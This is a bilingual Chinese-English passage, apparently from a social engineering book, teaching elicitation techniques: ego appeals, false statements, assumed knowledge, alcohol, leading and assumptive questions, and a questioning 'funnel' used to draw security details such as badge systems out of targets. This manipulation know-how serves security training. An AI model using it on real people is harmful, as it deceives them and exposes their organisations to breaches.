这些是成功诱导的关键要素。美国国土安全部 (DHS) 有一本关于诱导的内部小册子,分发给其特工,我可以在www.social-engineer.org/wiki/archives/BlogPosts/ocso-elicitation-brochure.pdf上找到并存档。

These are key elements to successful elicitation. The United States Department of Homeland Security (DHS) has an internal pamphlet on elicitation it hands out to its agents that I was able to obtain and archive at www.social-engineer.org/wiki/archives/BlogPosts/ocso-elicitation-brochure.pdf.

 

本手册包含一些很好的提示。基本上,正如手册和本章所述,使用诱导法是因为它有效、很难被发现并且没有威胁性。DHS 手册从“如何避免”的角度探讨诱导法,但以下部分将介绍一些场景并向您展示可以学到什么。

This brochure contains some excellent pointers. Basically, as stated in it and in this chapter, elicitation is used because it works, is very hard to detect, and is non-threatening. The DHS pamphlet approaches elicitation from a “how to avoid” point of view, but the following sections take some of the scenarios and show you what can be learned.

 

诉诸某人的自尊心

Appealing to Someone’s Ego

 

国土安全部宣传册中描绘的场景如下:

The scenario painted in the DHS brochure goes like this:

 

攻击者:“你肯定有一份重要的工作;某某似乎很看重你。”

Attacker: “You must have an important job; so and so seems to think very highly of you.”

 

目标:“谢谢,你这么说真是太好了,但我的工作没那么重要。我在这里做的只是……”

Target: “Thank you, that is nice of you to say, but my job isn’t that important. All I do here is…”

 

迎合某人自尊心的方法虽然简单但很有效。不过要注意:迎合某人的自尊心是一种很有效的手段,但如果你用力过猛或没有诚意,只会让对方反感。你不会想让对方觉得你是个疯狂的跟踪狂:“哇,你是宇宙中最重要的人,而且你长得也太迷人了。”说这样的话可能会招来保安。

The method of appealing to someone’s ego is simplistic but effective. One caution, though: Stroking someone’s ego is a powerful tool but if you overdo it or do it without sincerity it just turns people off. You don’t want to come off as a crazy stalker: “Wow, you are the most important person in the universe and you are so amazing-looking, too.” Saying something like that might get security called on you.

 

使用自我诉求需要巧妙地进行,如果你正在与一个真正的自恋者交谈,当她吹嘘自己的成就时,避免翻白眼、叹气或争辩。巧妙的自我诉求可以是这样的:“你做的那项研究确实改变了很多人对……的看法”或“我偷听到史密斯先生告诉那边的那群人,你是他最敏锐的数据分析师之一。”不要让这种做法太过夸张,以免太明显。

Using ego appeals needs to be done subtly, and if you are talking to a true narcissist avoid eye rolls, sighs, or argumentativeness when she brags of her accomplishments. Subtle ego appeals are things like, “That research you did really changed a lot of people’s viewpoints on…” or “I overheard Mr. Smith telling that group over there that you are one of the most keen data analysts he has.” Don’t make the approach so over the top that it is obvious.

 

正如国土安全部的宣传册中所说,微妙的奉承可以诱使一个人进行一段原本可能永远不会发生的对话,而这正是作为一名社会工程师所希望得到的。

Subtle flattery can coax a person into a conversation that might have never taken place, as stated in the DHS brochure, and that is exactly what you want as a social engineer.

 

表达共同兴趣

Expressing a Mutual Interest

 

考虑这个模拟场景:

Consider this mock scenario:

 

攻击者:“哇,你有 ISO 9001 合规数据库方面的背景知识?你应该看看我们为报告引擎构建的模型,它可以帮助你获得该认证。我可以给你一份副本。”

Attacker: “Wow, you have a background in ISO 9001 compliance databases? You should see the model we built for a reporting engine to assist with that certification. I can get you a copy.”

 

目标:“我很乐意看到这一点。我们一直在考虑在我们的系统中添加一个报告引擎。”

Target: “I would love to see that. We have been toying with the idea of adding a reporting engine to our system.”

 

表达共同兴趣是诱导的重要方面。这种特殊情况甚至比吸引某人的自尊心更有力,因为它将关系延伸到初次对话之外。目标同意进一步联系,接受攻击者的软件,并表示有兴趣讨论公司未来软件的计划。所有这些都可能导致严重的安全漏洞。

Expressing mutual interest is an important aspect of elicitation. This particular scenario is even more powerful than appealing to someone’s ego because it extends the relationship beyond the initial conversation. The target agreed to further contact, to accept software from the attacker, and expressed interest in discussing plans for the company’s software in the future. All of this can lead to a massive breach in security.

 

这种情况的危险在于,现在攻击者已经完全掌控了局面。他控制着接下来的步骤,发送什么信息、发送多少信息以及何时发布。这对社会工程师来说是一招非常厉害的招数。当然,如果这种接触是长期的,那么拥有一个可以共享的软件将会更加有利。共享可用且无恶意的软件将建立信任、建立融洽关系,并使目标产生责任感。

The danger in this situation is that now the attacker has full control. He controls the next steps, what information is sent, how much, and when it is released. This is a very powerful move for the social engineer. Of course, if the engagement were long-term, then having a literal piece of software that can be shared would prove even more advantageous. Sharing usable and non-malicious software would build trust, build rapport, and make the target have a sense of obligation.

 

故意作出虚假陈述

Making a Deliberate False Statement

 

发表虚假声明似乎会产生适得其反的效果,但事实证明,它会产生一股不可忽视的强大力量。

Delivering a false statement seems like it would backfire off the top, but it can prove to be a powerful force to be reckoned with.

 

攻击者:“大家都知道,XYZ 公司生产的这种小部件的软件是世界上销量最高的。”

Attacker: “Everybody knows that XYZ Company produced the highest-selling software for this widget on earth.”

 

目标:“事实上,这不是真的。我们公司从 1998 年开始销售类似产品,我们的销售记录经常比他们高出 23% 以上。”

Target: “Actually, that isn’t true. Our company started selling a similar product in 1998 and our sales records have beaten them routinely by more than 23%.”

 

如果能有效使用这些陈述,就能引出目标人物用真实事实做出反应。大多数人听到错误陈述时都必须纠正。这几乎就像是他们被要求证明自己是正确的。想要告知他人、表现得知识渊博和不能容忍错误陈述似乎是人类的天性。了解这一特征可以让这种情况变得更有说服力。你可以用这种方法从目标人物那里获取有关真实事实的全部细节,也可以辨别出一个群体中谁可能对某个主题最了解。

These statements, if used effectively, can elicit a response from the target with real facts. Most people must correct wrong statements when they hear them. It’s almost as if they are challenged to prove they are correct. The desire to inform others, appear knowledgeable, and be intolerant of misstatements seems to be built into human nature. Understanding this trait can make this scenario a powerful one. You can use this method to pull out full details from the target about real facts and also to discern who in a group might have the most knowledge about a topic.

 

志愿服务信息

Volunteering Information

 

DHS 手册很好地说明了我们许多人都具有的一种性格特征。书中已经多次提到了这一点,后面还会更详细地介绍,但义务是一种强大的力量。作为一名社会工程师,在谈话中提供信息几乎会迫使目标用同样有用的信息回复。

The DHS brochure makes a good point about a personality trait many of us have. A few mentions of it have appeared in the book already and it’s covered in much more detail later on, but obligation is a strong force. As a social engineer, offering up information in a conversation almost compels the target to reply with equally useful information.

 

想试试这个吗?下次和朋友在一起时,可以这样说:“你听说过露丝的事吗?我听说她刚被解雇,很难找到新工作。”

Want to try this one out? Next time you are with your friends say something like, “Did you hear about Ruth? I heard she just got laid off from work and is having serious problems finding more work.”

 

大多数情况下,你会听到这样的消息:“哇,我没听说。这真是个坏消息。我听说乔要离婚了,他们也会失去房子。”

Most of the time you will get, “Wow, I didn’t hear that. That is terrible news. I heard that Joe is getting divorced and they are going to lose the house, too.”

 

人类的一个悲哀之处在于,我们倾向于相信“同病相怜”这句话——这句话在这种情况下是多么正确。人们往往想要分享类似的新闻。社会工程师可以利用这种倾向来设定谈话的基调或情绪,并建立一种责任感。

A sad aspect of humanity is that we tend to live the saying “misery loves company”—how true it is in this case. People tend to want to share similar news. Social engineers can utilize this proclivity to set the tone or mood of a conversation and build a sense of obligation.

 

假设知识

Assuming Knowledge

 

另一个强大的操纵工具是假定知识。人们通常认为,如果某人了解某种情况,那么与他们讨论是可以接受的。攻击者可以故意利用这一特点,通过呈现信息,就好像他知道一样,然后使用诱导来围绕它展开对话。然后,他可以把这些信息当作自己的信息来复述,并继续制造他对这个话题有深入了解的假象。用一个例子来更好地说明这种情况可能更好。

Another powerful manipulation tool is that of assumed knowledge. It is commonplace to assume that if someone has knowledge of a particular situation, it’s acceptable to discuss it with them. An attacker can deliberately exploit this trait by presenting information as if he is in the know and then using elicitation to build a conversation around it. He then can regurgitate the information as if it were his own and continue to build the illusion that he has intimate knowledge of this topic. This scenario might be better illustrated with an example.

 

有一次,我去中国就一些材料进行大宗谈判。在谈判中,我需要对目标公司有深入的了解,因此必须在与他们会面之前找到获得这些信息的方法。我们从未见过面,但在谈判开始之前,我正前往中国参加一个会议。在会议上,我偶然听到了一段关于如何在与中国人谈判时将自己置于更高位置的对话。

One time I was going to China to negotiate a large deal on some materials. I needed to have some intimate knowledge about my target company in the negotiations and had to find a way to get it before I met with them. We had never met face to face but I was heading to a conference in China before my negotiations started. While at the conference I happened to overhear a conversation starting about how to place yourself in a higher position when dealing with the Chinese on negotiations.

 

我知道这是我的机会,而让情况更加甜蜜的是,小组中的一个人来自我将要会见的公司。我迅速加入谈话,我知道如果我不迅速说点什么,我会丢脸。我的知识有限,但他们不需要知道这一点。当出现短暂的停顿时,我开始谈论“关系”理论。关系基本上就是两个社会地位可能不同的人如何建立联系,然后其中一个人被迫为另一个人做点好事。我谈到了如何使用这种联系,然后总结道,作为一个美国人,不要只是拿一张名片塞进我的后口袋,而是要查看它、评论它,然后把它放在一个受人尊敬的地方,这一点非常重要。

I knew this was my opportunity, and to make the situation even sweeter one of the people in the small group was from the company I was going to be meeting with. I quickly injected myself into the conversation and knew that if I didn’t say something quick I would lose face. My knowledge was limited but they didn’t need to know that. When a small pause arose I began to talk about the Guanxi theory. Guanxi is basically how two people who may not have the same social status can become connected, and then one is pressed upon to perform a favor for the other. I talked about how this connection can be used, and then concluded by tying it in with how important it is as an American to not simply take a business card and stick it in my back pocket but to review it, comment on it, then place it somewhere respectful.

 

这次谈话足以让我成为一位有一定知识、值得留在信任圈的人。现在我已经建立了自己的知识基础,我坐下来听每个人分享他们关于如何与大型中国公司进行适当谈判的经验和个人知识。当我的目标公司员工发言时,我非常仔细和特别注意。在他讲话时,我可以看出他给出的“建议”与他公司的经营理念密切相关。这些知识比我能买到的任何东西都更有价值,这让我的旅行非常成功。

This conversation was enough to set me up as someone who had some knowledge and deserved to stay in the circle of trust there. Now that I had established my knowledge base I sat back and listened to each person express his or her experience and personal knowledge on how to negotiate properly with large Chinese companies. I paid very close and particular attention when the gentlemen who worked for my target company spoke. As he talked I could tell the “tips” he was giving were closely linked to the business philosophies of his company. This knowledge was more valuable than anything I could have paid for and it led to a very successful trip.

 

我觉得还有几个场景在引出过程中经常使用。

There are a couple more scenarios I feel are often used in elicitations.

 

利用酒精的作用

Using the Effects of Alcohol

 

没有什么比果汁更能让人放松。这是一个不幸但却真实的事实。将上述五种情况中的任何一种与酒精混合,你可以将其效果放大 10 倍。

Nothing loosens lips more than the juice. This is an unfortunate but true fact. Mix any one of the preceding five scenarios with alcohol and you can magnify its effects by 10.

 

也许描述这种情况的最好方式就是用一个真实的故事。

Probably the best way to describe this scenario is with a true story.

 

1980 年,洛斯阿拉莫斯国家实验室的一位资深科学家前往中国的一个研究机构,讲述他的专业领域——核聚变。他对美国核武器信息了如指掌,但他知道自己所处的境况很危险,需要下定决心坚持自己的主题。

In 1980 a senior scientist from Los Alamos National Laboratory traveled to a research institute in the People’s Republic of China (PRC) to talk about his specialty, nuclear fusion. He had extensive knowledge of U.S. nuclear weapons information but knew the situation he was entering was dangerous and he needed to be determined to stick to his topic.

 

然而,他却不断收到越来越详细的问题,这些问题直接与核武器有关。攻击者的策略会发生变化,他们会问很多关于核聚变和天体物理学(他的专长)的温和问题。

Yet he was constantly barraged with increasingly detailed inquiries directly related to nuclear weapons. The attackers’ tactics would change and they would ask many benign questions about fusion and astrophysics, his specialty.

 

有一次,他们甚至为他举办了一场鸡尾酒会。大家围在一起,为他的知识和研究鼓掌——每次都举杯庆祝,并喝上一杯。他们开始询问一些机密问题,比如当时新研制的中子弹的两种成分氘和氚的点火条件。他很好地回答了这些不断出现的问题,但在多次举杯庆祝和一场盛大的派对之后他决定打个比方。他沉思着对大家说,如果你把这两种成分卷成一个球,然后把它们从桌子上滚下来,它们很可能会点燃,因为它们的温度阈值水平非常低。

Once they even threw a cocktail party in his honor. They gathered around and applauded his knowledge and research—each time with a toast and a drink. They began to inquire about classified matters such as the ignition conditions of deuterium and tritium, the two components in the then-new neutron bomb. He did well at fending off the constant questions, but after many toasts and a party in his honor, he decided to give an analogy. He mused to the group that if you rolled those two components into a ball and then rolled them off the table they would most likely ignite because they had such low temperature threshold levels.

 

这些看似无用的故事和信息很可能让中国研究人员摸清了核武器研究的一条清晰的路线。他们会把这些信息带给另一位科学家,现在他们掌握了更多的知识,并利用这些知识与他或她一起进入下一个阶段。经过多次尝试,中国科学家很可能已经清楚地知道该走哪条路。

This seemingly useless story and information most likely caused the researchers in China to discern a clear path of research on nuclear weapons. They would take this information to yet another scientist and now armed with a little more knowledge, use that knowledge to get to the next stage with him or her. After many attempts, it is very likely the Chinese scientist would possess a clear picture of what path to take.

 

这是一个严肃的例子,说明如何使用诱导法可以清楚地了解整个答案。在社会工程学中,对你来说可能也一样。所有答案可能不来自一个来源。你可能会从一个人那里得到一些关于他们在某个日期的行踪的信息,然后利用这些信息在下一阶段得到更多信息,依此类推。把这些信息拼凑在一起往往是完善诱导技巧的难点。接下来会讨论这一点。

This is a serious example of how using elicitation can lead to gaining a clear picture of the whole answer. In social engineering it may be the same for you. All the answers might not come from one source. You may elicit some information from one person about their whereabouts on a particular date, and then use that information to elicit more information from the next stage, and so on and so forth. Putting those nuggets of information together is often the hard part of perfecting elicitation skills. That is discussed next.

 

使用智能问题

Using Intelligent Questions

 

作为一名社会工程师,你必须意识到,引诱的目的不是走上前去问:“你们服务器的密码是什么?”

As a social engineer you must realize that the goal with elicitation is not to walk up and say, “What is the password to your servers?”

 

目标是获取一些看似无用的细小信息,这些信息有助于清晰地了解你正在寻找的答案或获得这些答案的途径。无论哪种方式,这种类型的信息收集都可以帮助社会工程师获得一条非常清晰的路径来实现目标。

The goal is getting small and seemingly useless bits of information that help build a clear picture of the answers you are seeking or the path to gaining those answers. Either way, this type of information gathering can help give the social engineer a very clear path to the target goal.

 

你怎么知道要使用什么类型的问题?

How do you know what type of questions to use?

 

以下部分分析了存在的问题类型以及社会工程师如何使用它们。

The following sections analyze the types of questions that exist and how a social engineer can use them.

 

开放式问题

Open-Ended Questions

 

开放式问题不能用是或否来回答。问“今天很冷吧?”会得到“是”、“嗯嗯”、“是的”或其他类似的肯定的喉音,而问“你觉得今天的天气怎么样?”会得到真实的回答:对方必须用不止是或否来回答。

Open-ended questions cannot be answered with yes or no. Asking, “Pretty cold out today, huh?” will lead to a “Yes,” “Uh-uh,” “Yep,” or some other similar affirmative guttural utterance, whereas asking, “What do you think of the weather today?” will elicit a real response: the person must answer with more than a yes or no.

 

社会工程师学习如何使用开放式问题的一种方法是分析和研究优秀的记者。优秀的记者必须使用开放式问题来不断引出受访者的回答。

One way a social engineer can learn about how to use open-ended questions is to analyze and study good reporters. A good reporter must use open-ended questions to continue eliciting responses from his or her interviewee.

 

假设我计划和一位朋友见面,但他取消了,我想知道原因。我可以问这样的问题:“我很好奇那天晚上我们的计划发生了什么。”

Suppose I had plans to meet a friend and he canceled, and I wanted to know why. I can ask a question like, “I was curious about what happened to our plans the other night.”

 

“我感觉不太舒服。”

“I wasn’t feeling too well.”

 

“哦,希望你现在好些了。出了什么问题?”

“Oh, I hope you are better now. What was wrong?”

 

这种提问方式通常比对对方进行全面攻击并说“你到底怎么了,伙计?你昨晚抛弃了我!”这样的话更有效果。

This line of questioning usually gets more results than doing an all-out assault on the person and saying something like, “What the heck, man? You ditched me the other night!”

 

开放式问题的另一个增强说服力的方面是使用为什么如何。在问题后面加上如何为什么可以引出对你最初提问内容的更深入的解释。

Another aspect of open-ended questions that adds power is the use of why and how. Following up a question with how or why can lead to a much more in-depth explanation of what you were originally asking.

 

这个问题同样不能用“是”或“否”来回答,而且对方会透露你可能感兴趣的其他细节。

This question again is not “yes” or “no” answerable, and the person will reveal other details you may find interesting.

 

有时开放式问题会遭到一些抵制,因此使用金字塔方法可能会有所帮助。金字塔方法是指你从狭义的问题开始,然后在提问的最后提出更广泛的问题。如果你真的想熟练掌握这种技巧,那就学会把它用在青少年身上。

Sometimes open-ended questions can meet with some resistance, so using the pyramid approach might be good. The pyramid approach is where you start with narrow questions and then ask broader questions at the end of the line of questioning. If you really want to get great at this technique learn to use it with teenagers.

 

例如,很多时候开放式的问题,如“今天在学校过得怎么样?”,得到的回答都是“还行”,仅此而已,所以问一个狭义的问题可能会更好地打开信息流。

For example, many times open-ended questions such as, “How was school today?” will be met with an “OK” and nothing more, so asking a narrow question might open up the flow of information better.

 

“今年你的数学成绩怎么样?”这个问题的答案非常狭窄,只能用一个非常具体的答案来回答:“代数 II”。

“What are you doing in math this year?” This question is very narrow and can be answered only with a very specific answer: “Algebra II.”

 

“啊,我一直很讨厌这个。你觉得怎么样?”

“Ah, I always hated that. How do you like it?”

 

从那里开始,你总是可以扩展到更广泛的问题,并且在你让目标说话之后,获取更多信息通常会变得更容易。

From there you can always branch out into broader questions, and after you get the target talking, getting more info generally becomes easier.

 

封闭式问题

Closed-Ended Questions

 

显然,封闭式问题与开放式问题相反,但却是一种非常有效的引导目标的方法。封闭式问题的答案通常只有一两种可能。

Obviously, closed-ended questions are the opposite of open-ended questions but are a very effective way to lead a target where you want. Closed-ended questions often cannot be answered with more than one or two possibilities.

 

开放式问题可能会问:“您和您经理的关系如何?”而封闭式问题可能会表述为:“您和您经理的关系好吗?”

In an open-ended question one might ask, “What is your relationship with your manager?” but a closed-ended question might be worded, “Is your relationship with your manager good?”

 

详细信息通常不是封闭式问题的目的,而是引出目标。

Detailed information is usually not the goal with closed-ended questions; rather, leading the target is the goal.

 

执法人员和律师经常使用这种推理。如果他们想将目标引向一条特定的道路,他们会问一些非常封闭的问题,不允许自由回答。比如这样:

Law enforcement and attorneys use this type of reasoning often. If they want to lead their target down a particular path they ask very closed questions that do not allow for freedom of answers. Something like this:

 

“您认识被告史密斯先生吗?”

“Do you know the defendant, Mr. Smith?”

 

“是的,我愿意。”

“Yes I do.”

 

“6 月 14 日晚上,您在 ABC 酒馆见过史密斯先生吗?”

“On the night of June 14th, did you see Mr. Smith at the ABC Tavern?”

 

“是的。”

“I did.”

 

“那是什么时候?”

“And at what time was that?”

 

“晚上 11 点 45 分。”

“11:45pm.”

 

所有这些问题都是封闭式的,只允许一或两种类型的答案。

All of these questions are very closed ended and only allow for one or two types of responses.

 

引导性问题

Leading Questions

 

引导性问题结合了开放式问题和封闭式问题的特点,即在开放式问题的基础上,给出提示,引导回答问题。例如,“6 月 14 日晚上 11:45 左右,你和史密斯先生一起在 ABC 酒馆,对吧?”这类问题会引导目标回答你想要问的问题,同时也给他提供表达观点的机会,但范围非常狭窄。它还会让目标预先知道你对被问到的事件有所了解。

Combining aspects from both open- and closed-ended questions, leading questions are open ended with a hint leading toward the answer. Something like, “You were at the ABC Tavern with Mr. Smith on June 14th at around 11:45pm, weren’t you?” This type of question leads the target where you want but also offers him the opportunity to express his views, but very narrowly. It also preloads the target with the idea that you have knowledge of the events being asked about.

 

引导性问题通常可以用是或否来回答,但与封闭式问题不同,因为问题中植入了更多信息,回答后可以为社会工程师提供更多信息。引导性问题陈述一些事实,然后要求目标同意或不同意这些事实。

Leading questions often can be answered with a yes or no but are different from closed-ended questions because more information is planted in the question that when answered gives the social engineer more information to work with. Leading questions state some facts and then ask the target to agree or disagree with them.

 

1932 年,英国心理学家弗雷德里克·巴特利特 (Frederic C. Bartlett) 完成了一项关于重建记忆的研究。他给受试者讲了一个故事,然后要求他们立即回忆故事内容,两周后回忆,四周后回忆。巴特利特发现受试者会根据自己的文化、信仰和个性来修改故事。没有人能够准确完整地回忆起故事。事实证明,记忆并不是我们过去的准确记录。人类似乎试图让记忆符合我们现有的世界观。当被问到问题时,很多时候我们会根据自己的感知和对我们重要的事情从记忆中做出回答。

In 1932 the British psychologist Frederic C. Bartlett concluded a study on reconstructive memory. He told subjects a story and then asked them to recall the facts immediately, two weeks later, and then four weeks later. Bartlett found that subjects modified the story based on their culture and beliefs as well as personality. None were able to recall the story accurately and in its entirety. It was determined that memories are not accurate records of our past. It seems that humans try to make the memory fit into our existing representations of the world. When asked questions, many times we respond from memory based on our perceptions and what is important to us.

 

因此,向人们提出诱导性问题并操纵他们的记忆是可能的。目击证词研究领域的领军人物伊丽莎白·洛夫特斯 (Elizabeth Loftus) 通过使用诱导性问题证明了如何轻易扭曲人们对某一事件的记忆。例如,如果你向一个人展示一张儿童房的照片,照片中没有泰迪熊,然后问她“你看到泰迪熊了吗?”你并不是在暗示房间里有一只泰迪熊,这个人可以随意回答是或否。但是,问“你看到泰迪熊了吗?”暗示房间里有一只泰迪熊,这个人更有可能回答“是”,因为泰迪熊的存在与这个人对儿童房的图式一致。

Because of this, asking people a leading question and manipulating their memory is possible. Elizabeth Loftus, a leading figure in the field of eyewitness testimony research, has demonstrated through the use of leading questions how distorting a person’s memory of an event is easily possible. For example, if you showed a person a picture of a child’s room that contained no teddy bear, and then asked her, “Did you see a teddy bear?” you are not implying that one was in the room, and the person is free to answer yes or no as they wish. However, asking, “Did you see the teddy bear?” implies that one was in the room and the person is more likely to answer “yes,” because the presence of a teddy bear is consistent with that person’s schema of a child’s room.

 

根据这项研究,诱导性问题对于熟练的社会工程师来说是一种非常有效的工具。学习如何诱导目标也可以提高社会工程师收集信息的能力。

Because of this research the use of leading questions can be a powerful tool in the hands of a skilled social engineer. Learning how to lead the target can also enhance a social engineer’s ability to gather information.

 

假设性问题

Assumptive Questions

 

假设性问题顾名思义就是假设目标已经掌握了某些知识。社会工程师可以通过提出假设性问题来确定目标是否掌握了他们想要的信息。

Assumptive questions are just what they sound like—where you assume that certain knowledge is already in the possession of the target. The way a social engineer can determine whether or not a target possesses the information he is after is by asking an assumptive question.

 

例如,执法人员使用的一项技能是假设目标已经具备一定的知识(例如,关于某人的知识),并询问“史密斯先生住在哪里?”之类的问题。根据给出的答案,警官可以确定目标是否认识此人以及对他了解多少。

For example, one skill employed by law enforcement is to assume the target already has knowledge—for example, of a person—and ask something like, “Where does Mr. Smith live?” Depending on the answer given, the officer can determine whether the target knows the person and how much she knows about him.

 

需要注意的一点是,当社会工程师使用假设性问题时,绝不能将整个情况告诉目标。这样做会将所有权力交给目标,并剥夺社会工程师控制环境的大部分能力。社会工程师绝不会使用假设性问题来指责目标犯错。这样做会疏远目标,并再次削弱社会工程师的权力。

A good point to note is that when a social engineer uses assumptive questions the whole picture should never be given to the target. Doing so gives all the power to the target and removes much of the social engineer’s ability to control the environment. The social engineer never wants to use assumptive questions to accuse the target of a wrong. Doing so alienates the target and again costs the social engineer power.

 

当社会工程师知道问题中可以使用的真实事实时,他应该使用假设性问题。使用带有虚假信息的假设性问题可能会让目标感到厌烦,并且只会证实目标不知道没有发生的事情。回到前面的例子,如果我想从一位顶尖化学家那里获得信息,并且我做了一些研究,并且知道足以组织一个聪明的句子,我可以提出一个假设性问题,但如果我无法支持目标对我的知识的假设,那么这将破坏未来的跟进。

A social engineer should use assumptive questions when he has some idea of the real facts he can use in the question. Using an assumptive question with bogus information may turn the target off and will only confirm that the target doesn’t know about something that didn’t happen. Back to an earlier example, if I wanted to gain information from a leading chemist and I did some research and knew enough to formulate one intelligent sentence I could make an assumptive question but it would ruin future follow up if I was not able to back up the assumption the target would make of my knowledge.

 

例如,如果我问:“由于氘和氚的温度阈值如此之低,如何处理这些材料以避免着火?”如果我不是核物理学家,后续信息可能很难理解。这是适得其反的,也没什么用。计划好你的假设性问题,以达到最大效果。

For example, if I were to ask, “Because deuterium and tritium have such low temperature thresholds, how does one handle these materials to avoid ignition?” The follow-up information might be hard to follow if I am not a nuclear physicist. This is counterproductive and not too useful. Plan your assumptive questions to have the maximum effect.

 

执法人员在使用假设性问题时,可以学到一种非常有用的辅助技巧,那就是说“现在,在回答下一个问题之前,请仔细考虑一下……”这种说法会让目标在脑海中预先形成这样一种观念:他下次说话时必须说实话。

One adjunct that is taught to law enforcement officials that comes in very handy when using assumptive questions is to say, “Now think carefully before you answer the next question…” This kind of a statement preloads the target’s mind with the idea that he must be truthful with his next statement.

 

掌握这些技能可能需要数月或数年的时间。如果前几次尝试没有成功,不要灰心,继续尝试。不过不要害怕,掌握这项技能有一些技巧。我将在最后回顾这些技巧。

It can take months or years to master these skills. Don’t get disheartened if the first few attempts are not successful, and keep trying. Don’t fear, though, there are some tips to mastering this skill. I will review these in closing.

 

掌握诱导

Mastering Elicitation

 

本章包含大量信息供您吸收,如果您不擅长人际交往,那么使用所涵盖的技术似乎是一项艰巨的任务。与社会工程学的大多数方面一样,诱导有一套原则,应用这些原则将提高您的技能水平。为了帮助您掌握这些原则,请记住以下几点:

This chapter has a lot of information for you to absorb, and if you are not a people person, employing the techniques covered might seem like a daunting task. Like most aspects of social engineering, elicitation has a set of principles that when applied will enhance your skill level. To help you master these principles, remember these pointers:

 
 
     
  • 太多问题会让目标失去兴趣。用一连串问题轰炸目标只会让目标失去兴趣。记住,对话是一种给予和接受。你想问,但你必须给予,让目标感到安心。
  • Too many questions can shut down the target. Peppering the target with a barrage of questions will do nothing but turn off the target. Remember, conversation is a give and take. You want to ask, but you have to give to make the target feel at ease.
  •  
     
  • 提问太少会让目标感到不舒服。你有没有经历过充满“尴尬沉默”的谈话?这不是很好,不是吗?不要以为你的目标是一个熟练且乐于交谈的人。你必须努力让谈话成为一次愉快的经历。
  • Too few questions will make the target feel uncomfortable. Have you ever been in a conversation that is filled with “awkward silences”? It isn’t good is it? Don’t assume that your target is a skilled and willing conversationalist. You must work at making a conversation an enjoyable experience.
  •  
     
  • 一次只问一个问题。第 5 章介绍了缓冲区溢出对人类思维的影响,但此时你的目标不是溢出目标。你只是要收集信息并建立个人资料。要做到这一点,你不能显得太热切或不感兴趣。
  • Ask only one question at a time. Chapter 5 covers buffer overflows on the human mind, but at this time your goal is not to overflow the target. It is to merely gather information and build a profile. To do this you can’t seem too eager or non-interested.
  •  
 

你可能已经意识到,让诱导发挥作用需要一种微妙的平衡。太多、太少、一次太多、不够——任何一种情况都会扼杀你成功的机会。

As you have probably gathered, making elicitation work right is a delicate balance. Too much, too little, too much at once, not enough—any one of them will kill your chances at success.

 

但是,这些原则可以帮助你掌握这种惊人的才能。无论你是用这种方法进行社交工程,还是只是学习如何与人互动,都可以试试这个:把对话想象成一个漏斗,顶部是最大、最“中性”的部分,底部是非常狭窄、直接的末端。

However, these principles can help you master this amazing talent. Whether you use this method for social engineering or just learning how to interact with people, try this: Think of conversation as a funnel, where on the top is the largest, most “neutral” part and at the bottom is the very narrow, direct ending.

 

首先向目标问一些非常中性的问题,然后利用这些问题收集一些情报。在对话中互相给予和接受,然后转向几个开放式问题。如果需要,使用几个封闭式问题将目标引导到你想要去的地方,然后如果情况合适,当你到达漏斗末端时转向高度定向的问题。从漏斗的“喷口”中涌出的将是一条信息之河。

Start by asking the target very neutral questions, and gather some intel using these questions. Give and take in your conversation, and then move to a few open-ended questions. If needed, use a few closed-ended questions to direct the target to where you want to go and then if the situation fits, move to highly directed questions as you reach the end of funnel. What will pour out of the “spout” of that funnel is a river of information.

 

想想本章讨论的我在商会聚会上的目标。我的目标是收集可能导致安全漏洞的任何情报。

Think about it in the situation discussed in this chapter of my target at the chamber of commerce gathering. My goal was to gather intel on anything that might lead to a security breach.

 

我以一个非常中性的问题开始了谈话。“逃离秃鹫?”这个问题打破了谈话的僵局,并用一点幽默建立了一座桥梁,让我们存在于同一个思想层面。我问了几个更中性的问题,并递给他我的名片,同时询问他做什么。这顺利地过渡到开放式问题。

I started off the conversation with a very neutral question. “Escaping the vultures?” This question broke the ice on the conversation as well as used a little humor to create a bridge that allowed us to exist on the same plane of thought. I asked a few more neutral questions and handed him my card while inquiring what he does. This segues smoothly into the open-ended questions.

 

之前进行了一次简短的信息收集会议,使用精心设计的封闭式或假设性问题是关键。在听说公司最近购买了新的会计软件和网络升级后,我想一举成功。在查看了大楼后,我知道它使用了 RFID,但我不确定目标是否会描述这张卡并向我展示。

A brief information-gathering session that occurred earlier, using carefully placed closed-ended or assumptive questions was key. After hearing about the company’s recent purchase for new accounting software and network upgrades I wanted to go in for the kill. Having scoped out the building I knew it used RFID, but I wasn’t sure if the target would go so far as to describe the card and show it to me.

 

这就是直接提问的作用:直接问公司使用什么安全措施。当我使用这种类型的问题时,我们的融洽关系和信任度已经很高了,他可能会回答我提出的任何问题。

This is where the use of direct questions played a role: coming right out and asking what security the company used. By the time I used that type of question our rapport and trust factor was so high he probably would have answered any questions I asked.

 

了解如何与人沟通是引诱者的一项基本技能。社会工程师必须具有适应能力,能够根据自己的环境和情况来安排对话。与目标快速建立哪怕是最小的信任也至关重要。如果没有这种融洽的关系,对话很可能会失败。

Understanding how to communicate with people is an essential skill for an elicitor. The social engineer must be adaptive and able to match the conversation to his or her environment and situation. Quickly building even the smallest amount of trust with the target is crucial. Without that rapport, the conversation will most likely fail.

 

其他关键因素包括确保您的沟通风格、使用的问题以及说话方式都符合您的借口。知道如何提出迫使对方做出回应的问题是成功诱导的关键,但如果所有这些技巧和所有这些问题都不符合您的借口,那么诱导尝试肯定会失败。

Other key factors include making sure that your communication style, the questions used, and the manner in which you speak all match your pretext. Knowing how to ask questions that force a response is a key to successful elicitation, but if all that skill and all those questions do not match your pretext then the elicitation attempt will most surely fail.

 

概括

Summary

 

本章涵盖了本书中一些最有力的要点 — 之所以有力,是因为应用这些要点不仅可以改变您的社会工程能力,还可以改变您作为沟通者的能力。知道如何以正确的时态和正确的方式提出正确的问题可以带来很多机会。作为一名社会工程师,这就是成功与失败的区别。第一印象最初是基于视觉,但从您嘴里说出的第一句话可以决定交易的成败。掌握诱导技巧几乎可以保证作为一名社会工程师的成功,并且可以为您决定使用的任何借口增加重要的分量。

This chapter covered some of the most powerful points in this whole book—powerful in the sense that applying them can change not only your social engineering abilities but also your abilities as a communicator. Knowing how to ask the right questions in the right tense and the right manner can open so many opportunities. As a social engineer, this is what separates success from failure. First impressions are based initially on sight, but what comes out of your mouth first can make or break the deal. Mastering elicitation can almost guarantee success as a social engineer and can add serious weight to any pretext you decide to use.

 

在本章中,我提到了借口的力量。这是每个社会工程师(无论是恶意的还是专业的)都必须掌握的另一个主题。但是,你如何才能确保实现这一目标呢?要回答这个问题,你必须了解借口,并准确理解它是什么,如第 4 章所述。

